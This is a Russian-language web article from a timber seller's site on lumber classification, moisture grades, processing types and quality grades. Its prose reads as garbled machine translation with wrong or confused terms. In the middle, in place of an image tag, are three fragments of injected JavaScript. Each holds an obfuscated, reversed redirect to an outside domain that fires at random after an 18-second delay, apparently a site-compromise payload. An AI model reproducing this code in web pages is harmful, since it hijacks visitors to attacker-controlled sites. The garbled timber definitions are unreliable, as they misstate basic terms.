Добавить в закладки

Особености пиломатериалов

Пиломатериалы https://ruslesmsk.ru/price-list/ : термины, определения, классификации
Каждый вид древесины имеет свои специфические характеристики, поэтому принято соответствовать общепринятым классификациям, основанным на форме и размере пиломатериалов, породе древесины и других определенных показателях, и регулируется существующими стандартами.
Внешняя классификация:

Брусья — прямоугольная древесина шириной и толщиной в поперечном сечении более 100 мм; доски — древесина толщиной менее 10 см и более чем в два раза большей толщины; доски, доски, шпалы — группа вспомогательных материалов малых габаритов и размеров. прямоугольного сечения; Aura — широко применяемая в строительных материалах, это тонкая и узкая доска.
По способу обработки поверхности древесина может иметь широкую поверхность (грань), узкую поверхность (кромку) и торец (торец). По типу пиломатериалов — пиломатериалы радиальные (распил от сердцевины к краю ствола), тангенциальные (на определенном расстоянии от сердцевины), смешанные пиломатериалы.

tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos_25074639-stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock-photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-stacked-lumber-background.jpg» alt=»» width=»600″ height=»400″ />

Согласно ГОСТу влажность пиломатериалов — одно из важнейших качеств древесины, и на этом основании существует отдельная сортность. По уровню абсолютной влажности древесина делится на следующие виды:

Мокрый — влажность более 100%; свежий срез — влажность 50 …

100%; воздушная сушка-15 … 20%; комнатная температура сушка-8 … 10%; абсолютная сухая влажность около 0%.

Породы древесины
Конечные характеристики готового материала будут напрямую зависеть от вида используемой древесины, технологического оборудования и самой технологии производства. На текстуру доски также влияют многие факторы.

Разница в степени обработки
Без полей (без сучков, но есть участки, не полностью обработанные);
Тип обрезки (за счет обрезания проблемной стороны контур будет прямоугольным);
Строганный тип (ни малейшей шероховатости на любой пригодной кромке).

Распространенные породы дерева и их использование
Одна из наиболее востребованных сегодня пород древесины — четырехсторонняя, трехсторонняя и двухсторонняя древесина. Широко применяется для опор при возведении и установке стропил, в домостроении — для возведения временных построек и черновых полов.

При возведении грубых конструкций и временных ограждений также популярны бескрайние панели. Боковые панели повсюду в архитектуре: изготовление деревянных дверей и окон, укладка деревянных полов, возведение стен, лестниц и потолков. Для внутренней отделки большим спросом пользуются дома из кирпича и вагонки.
Первый уровень — пиломатериалы практически без дефектов (узелков, трещин, сквозных наростов, побурения, плесени, гнили и т. Д.); Второй уровень допускает небольшое количество дефектов, но не должно быть заусенцев, глубоких трещин, поломок, гниль, инородные тела Для третьего уровня включений допускается много дефектов, но существует также определенный процент от количества дефектов на единицу материала. Почти все дефекты допускаются для четвертого уровня, при условии целостности материала. поддерживается.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 29.07.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: